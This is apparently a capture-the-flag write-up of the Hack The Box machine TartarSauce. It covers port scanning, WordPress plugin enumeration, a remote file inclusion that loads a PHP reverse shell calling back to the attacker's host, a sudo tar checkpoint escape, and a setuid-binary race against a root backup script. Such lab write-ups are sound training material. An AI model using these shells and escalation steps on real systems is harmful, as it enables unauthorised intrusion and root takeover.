Hack The Box: TartarSauce Write-up (#15)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.88
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • Port 80: — Running HTTP service (Apache 2.4.18 Ubuntu)
Nmap scan report for 10.10.10.88
Host is up, received user-set (0.013s latency).
Scanned at 2020-08-30 15:41:35 +08 for 41s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
nmap -sU -O --top-ports=20 -oA nmap/udp 10.10.10.88
  • -sU: UDP scan
Nmap scan report for 10.10.10.88
Host is up, received user-set (0.011s latency).
Scanned at 2020-08-30 15:41:35 +08 for 183s
PORT STATE SERVICE REASON VERSION
53/udp closed domain port-unreach ttl 63
67/udp open|filtered dhcps no-response
68/udp closed dhcpc port-unreach ttl 63
69/udp closed tftp port-unreach ttl 63
123/udp open|filtered ntp no-response
135/udp closed msrpc port-unreach ttl 63
137/udp closed netbios-ns port-unreach ttl 63
138/udp open|filtered netbios-dgm no-response
139/udp closed netbios-ssn port-unreach ttl 63
161/udp closed snmp port-unreach ttl 63
162/udp closed snmptrap port-unreach ttl 63
445/udp closed microsoft-ds port-unreach ttl 63
500/udp closed isakmp port-unreach ttl 63
514/udp closed syslog port-unreach ttl 63
520/udp closed route port-unreach ttl 63
631/udp open|filtered ipp no-response
1434/udp closed ms-sql-m port-unreach ttl 63
1900/udp open|filtered upnp no-response
4500/udp open|filtered nat-t-ike no-response
49152/udp open|filtered unknown no-response
...

Service Enumeration

Port 80 (HTTP)

/robots.txt
python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.88/webservices/monstra-3.0.4/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e txt,php -x 404,403
  • -u: Target URL
  • -w: Wordlist
  • -e: File extension
  • -x: Status code to exclude
Searchsploit
...SNIP...
[15:48:02] 200 - 4KB - /webservices/monstra-3.0.4/
[15:48:02] 301 - 337B - /webservices/monstra-3.0.4/public -> http://10.10.10.88/webservices/monstra-3.0.4/public/
[15:48:02] 301 - 336B - /webservices/monstra-3.0.4/admin -> http://10.10.10.88/webservices/monstra-3.0.4/admin/
[15:48:03] 301 - 338B - /webservices/monstra-3.0.4/storage -> http://10.10.10.88/webservices/monstra-3.0.4/storage/
[15:48:03] 301 - 338B - /webservices/monstra-3.0.4/plugins -> http://10.10.10.88/webservices/monstra-3.0.4/plugins/
[15:48:03] 301 - 337B - /webservices/monstra-3.0.4/engine -> http://10.10.10.88/webservices/monstra-3.0.4/engine/
[15:48:04] 301 - 340B - /webservices/monstra-3.0.4/libraries -> http://10.10.10.88/webservices/monstra-3.0.4/libraries/
[15:48:06] 301 - 334B - /webservices/monstra-3.0.4/tmp -> http://10.10.10.88/webservices/monstra-3.0.4/tmp/
[15:48:15] 301 - 335B - /webservices/monstra-3.0.4/boot -> http://10.10.10.88/webservices/monstra-3.0.4/boot/
[15:48:17] 301 - 338B - /webservices/monstra-3.0.4/backups -> http://10.10.10.88/webservices/monstra-3.0.4/backups/

Task Completed
Admin login page
python3 /opt/dirsearch/dirsearch.py -u 10.10.10.88/webservices/ -e txt,php -x 404
....
[18:54:15] 301 - 319B - /webservices/wp -> http://10.10.10.88/webservices/wp/
....
WordPress site
Broken link
View Page Source
root@kali:/htb/TartarSauce# python3 /opt/dirsearch/dirsearch.py -u 10.10.10.88/webservices/wp/ -e txt,php -x 404,403,500
...SNIP...
[20:01:29] Starting:
[20:01:34] 301 - 0B - /webservices/wp/index.php -> http://10.10.10.88/webservices/wp/
[20:01:34] 200 - 19KB - /webservices/wp/license.txt
[20:01:35] 200 - 7KB - /webservices/wp/readme.html
[20:01:37] 301 - 328B - /webservices/wp/wp-admin -> http://10.10.10.88/webservices/wp/wp-admin/
[20:01:37] 301 - 330B - /webservices/wp/wp-content -> http://10.10.10.88/webservices/wp/wp-content/
[20:01:37] 200 - 0B - /webservices/wp/wp-content/
[20:01:37] 200 - 69B - /webservices/wp/wp-content/plugins/akismet/akismet.php
[20:01:37] 302 - 0B - /webservices/wp/wp-admin/ -> http:/10.10.10.88/webservices/wp/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.88%2Fwebservices%2Fwp%2Fwp-admin%2F&reauth=1
[20:01:37] 301 - 331B - /webservices/wp/wp-includes -> http://10.10.10.88/webservices/wp/wp-includes/
[20:01:37] 200 - 1KB - /webservices/wp/wp-admin/install.php
[20:01:37] 200 - 2KB - /webservices/wp/wp-login.php
[20:01:37] 405 - 42B - /webservices/wp/xmlrpc.php
wpscan --api-token '<Your API Token>' --url http://10.10.10.88/webservices/wp -e ap --plugins-detection aggressive
  • — api-token: Personal API token.
  • — url: Target URL.
  • -e: Enumeration option.
  • — plugin-detection: Use the supplied mode to enumerate Plugins.
[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'
...SNIP...[i] Plugin(s) Identified:[+] akismet
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
| Last Updated: 2020-08-10T16:49:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 4.1.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
|
| Version: 4.0.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
...SNIP...[+] gwolle-gb
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| Last Updated: 2020-08-10T09:52:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| [!] The version is out of date, the latest version is 4.0.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
| Fixed in: 2.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/9109
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17884
| - https://seclists.org/fulldisclosure/2018/Jul/89
| - http://www.defensecode.com/advisories/DC-2018-05-008_WordPress_Gwolle_Guestbook_Plugin_Advisory.pdf
| - https://plugins.trac.wordpress.org/changeset/1888023/gwolle-gb
|
| Version: 2.3.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
Searchsploit
searchsploit -m php/webapps/38861.txt

Exploitation

cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php wp-load.php
<?phpset_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.10'; // CHANGE THIS
$port = 53; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
root@kali:/htb/TartarSauce# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
root@kali:/htb/TartarSauce# nc -nlvp 53
listening on [any] 53 ...
10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.10/
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo;fg
root@kali:/htb/TartarSauce# stty raw -echo;fg
nc -nlvp 53
www-data@TartarSauce:/$
export TERM=xterm-color

Post-Exploitation Enumeration

./lse -l 1 -i

Privilege Escalation #1

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

Privilege Escalation #2

onuma@TartarSauce:/tmp$ file /usr/sbin/backuperer
/usr/sbin/backuperer: Bourne-Again shell script, UTF-8 Unicode text executable
onuma@TartarSauce:/tmp$ ls -l /usr/sbin/backuperer
-rwxr-xr-x 1 root root 1701 Feb 21 2018 /usr/sbin/backuperer
./LinEnum.sh
onuma@TartarSauce:/tmp$ cat /lib/systemd/system/backuperer.service
[Unit]
Description=Backuperer
[Service]
ExecStart=/usr/sbin/backuperer
onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer 
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
  1. It recursively deletes tmp files/directories (/var/tmp/ and /var/tmp/check)
  2. It archives and compresses files under /var/www/html and saves it in the /var/tmp/.<randam sha1 value>.
  3. Sleep for 30 secs.
  4. It creates a directory /var/tmp/check
  5. Then it changes directory to /var/tmp/check and extracts /var/tmp/.<random sha1> file here.
  6. It perform the integrity check between /var/www/html and /var/tmp/check/var/www/html. If there is any different, then it reports error. Otherwise it move the file /var/tmp/.<random sha1 value> to /var/backups/onuma-www-dev.bak and then recursively remove all files/directories under /var/tmp/check/ directory and /var/tmp/.<random sha1 value> (represent by “.”).
onuma@TartarSauce:/var/tmp$ uname -a
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
int main() {
setuid(0);
system("/bin/bash -p");
}
gcc -m32 -o setuid setuid.c
root@kali:/htb/TartarSauce/var/www/html# chmod +s setuid
root@kali:/htb/TartarSauce/var/www/html# ls -ltr
total 16K
-rwsr-sr-x 1 root root 16K Aug 31 12:54 setuid
root@kali:/htb/TartarSauce# tar -zcvf exploit var/
var/
var/www/
var/www/html/
var/www/html/setuid
python3 -m http.server 80
onuma@TartarSauce:/var/tmp$ wget http://10.10.14.10/exploit
--2020-08-31 01:04:14-- http://10.10.14.10/exploit
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2761 (2.7K) [application/octet-stream]
Saving to: 'exploit'
exploit 100%[===================>] 2.70K --.-KB/s in 0s2020-08-31 01:04:14 (301 MB/s) - 'exploit' saved [2761/2761]
systemctl list-timers
onuma@TartarSauce:/var/tmp$ ll
total 44
drwxrwxrwt 9 root root 4096 Aug 31 01:08 ./
drwxr-xr-x 14 root root 4096 Feb 9 2018 ../
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:08 .c58430b363fa15856dcd269d38a9bdb29b419baa
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:03 exploit
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS/
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ/
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R/
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td/
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER/
drwx------ 3 root root 4096 Aug 30 09:56 systemd-private-e06751decbfd46c6b758f30aeee90b77-systemd-timesyncd.service-Fn6Ryx/
cp exploit .c58430b363fa15856dcd269d38a9bdb29b419baa
onuma@TartarSauce:/var/tmp$ ls -ltr
total 44
drwxrwxrwt 9 root root 4096 Aug 31 01:08 ./
drwxr-xr-x 14 root root 4096 Feb 9 2018 ../
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:08 .c58430b363fa15856dcd269d38a9bdb29b419baa
drwxr-xr-x 3 root root 4096 Aug 31 01:08 check/
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:03 exploit
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls -ltr
total 24
drwxr-xr-x 2 root root 4096 Aug 31 00:56 ./
drwxr-xr-x 3 root root 4096 Aug 31 00:52 ../
-rwsr-sr-x 1 root root 15524 Aug 31 00:54 setuid
onuma@TartarSauce:/var/tmp/check/var/www/html$ ./setuid -p
root@TartarSauce:/var/tmp/check/var/www/html#

Attack Strategy Map

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

47 Followers

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.